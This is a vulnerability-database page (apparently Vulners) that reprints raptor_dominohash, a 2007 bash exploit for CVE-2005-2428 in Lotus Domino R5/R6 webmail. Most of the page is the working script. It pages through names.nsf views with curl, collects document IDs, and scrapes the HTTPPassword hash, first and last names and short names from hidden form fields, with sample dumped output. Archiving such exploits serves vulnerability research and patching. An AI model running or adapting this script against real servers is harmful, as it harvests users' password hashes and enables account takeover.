Vulners
Lucene search
Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit
| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
 | IBM Lotus Domino R8 - Password Hash Extraction Exploit | 25 Feb 201600:00 | – | zdt |
| Lotus Domino <= R6 Webmail Remote Password Hash Dumper Exploit | 13 Feb 200700:00 | – | zdt |
 | Lotus Domino Server Multiple Information Disclosure Vulnerabilities | 26 Jul 200500:00 | – | nessus |
| IBM Lotus Domino HTML Hidden Field Encrypted Password Disclosure | 27 Jul 200500:00 | – | nessus |
 | CVE-2005-2428 | 3 Aug 200504:00 | – | cve |
| CVE-2005-2696 | 25 Aug 200504:00 | – | cve |
 | CVE-2005-2428 | 3 Aug 200504:00 | – | cvelist |
| CVE-2005-2696 | 25 Aug 200504:00 | – | cvelist |
 | DSquare Exploit Pack: D2SEC_LOTUS_HASH | 3 Aug 200504:00 | – | d2 |
 | IBM Lotus Domino R8 - Password Hash Extraction | 25 Feb 201600:00 | – | exploitdb |
10
#!/bin/bash
#
# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $
#
# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
# Copyright (c) 2007 Marco Ivaldi <[email protected]>
#
# Lotus Domino R5 and R6 WebMail, with \"Generate HTML for all fields\" enabled,
# stores sensitive data from names.nsf in hidden form fields, which allows
# remote attackers to read the HTML source to obtain sensitive information such
# as (1) the password hash in the HTTPPassword field, (2) the password change
# date in the HTTPPasswordChangeDate field, (3) the client platform in the
# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and
# (5) the client Lotus Domino release in the ClntBld field, a different
# vulnerability than CVE-2005-2696 (CVE-2005-2428).
#
# According to testing, it\'s possible to dump all HTTPPassword hashes using the
# $defaultview view instead of $users. This saves a considerable amount of time.
#
# The code may require some changes to properly work with your configuration.
#
# See also:
# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
#
# Usage:
# $ ./raptor_dominohash 192.168.0.202
# [...]
# Extracting the view entries...
# Done! 656 unique entries have been found.
# Now ready to dump password hashes...
# [...]
# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
# FirstName: Foo
# LastName: Bar
# ShortName: fbar
# HTTPPassword: (355E98E7C7B59BD810ED845AD0FD2FC4)
# [...]
#
# Vulnerable platforms:
# Lotus Domino R6 Webmail [tested]
# Lotus Domino R5 Webmail [untested]
# Lotus Domino R4 Webmail? [untested]
#
# Some vars
i=1
tmp1=dominohash1.tmp
tmp2=dominohash2.tmp
# Command line
host=$1
# Local fuctions
function header() {
echo \"\"
echo \"raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump\"
echo \"Copyright (c) 2007 Marco Ivaldi <[email protected]>\"
echo \"\"
}
function footer() {
echo \"\"
exit 0
}
function usage() {
header
echo \"usage : ./raptor_dominohash <host>\"
echo \"example: ./raptor_dominohash 192.168.0.202\"
footer
}
function notfound() {
header
echo \"error : curl not found\"
footer
}
# Check if curl is there
curl=`which curl 2>/dev/null`
if [ $? -ne 0 ]; then
notfound
fi
# Input control
if [ -z \"$1\" ]; then
usage
fi
# Remove temporary files
rm -f $tmp1
rm -f $tmp2
header
# Extract the view entries
echo \"Extracting the view entries...\"
while :
do
curl \"http://${host}/names.nsf/$defaultview?Readviewentries&Start=${i}\" 2>/dev/null | grep unid >> $tmp1
# Check grep return value
if [ $? -ne 0 ]; then
break
fi
# Go for the next page
i=`expr $i + 30`
echo -ne \"$i\"
done
cat $tmp1 | awk -F\'unid=\"\' \'{print $2}\' | awk -F\'\"\' \'{print $1}\' | sort | uniq > $tmp2
# Check if some view entries have been found
if [ ! -s $tmp2 ]; then
echo \"No entries found on host ${host}!\"
footer
fi
echo -ne \"Done! \"
echo \"`wc -l ${tmp2} | awk \'{print $1}\'` unique entries have been found.\"
echo \"\"
# Perform the hash dumping
echo \"Now ready to dump password hashes...\"
echo \"\"
sleep 4
for unid in `cat $tmp2`
do
echo \"[http://${host}/names.nsf/$defaultview/${unid}]\"
echo \"\"
#curl \"http://${host}/names.nsf/$defaultview/${unid}?OpenDocument\" 2>/dev/null | egrep \'\"FullName\"|\"HTTPPassword\"\'
curl \"http://${host}/names.nsf/$defaultview/${unid}?OpenDocument\" 2>/dev/null | egrep \'\"FirstName\"|\"LastName\"|\"ShortName\"|\"HTTPPassword\"\' | awk -F\'input name=\"\' \'{print $2}\' | awk -F\'\" type=\"hidden\" value=\"\' \'{print $1 \": \" $2}\' | tr -d \'\">\'
echo \"\"
done
footer
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Feb 2007 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.08605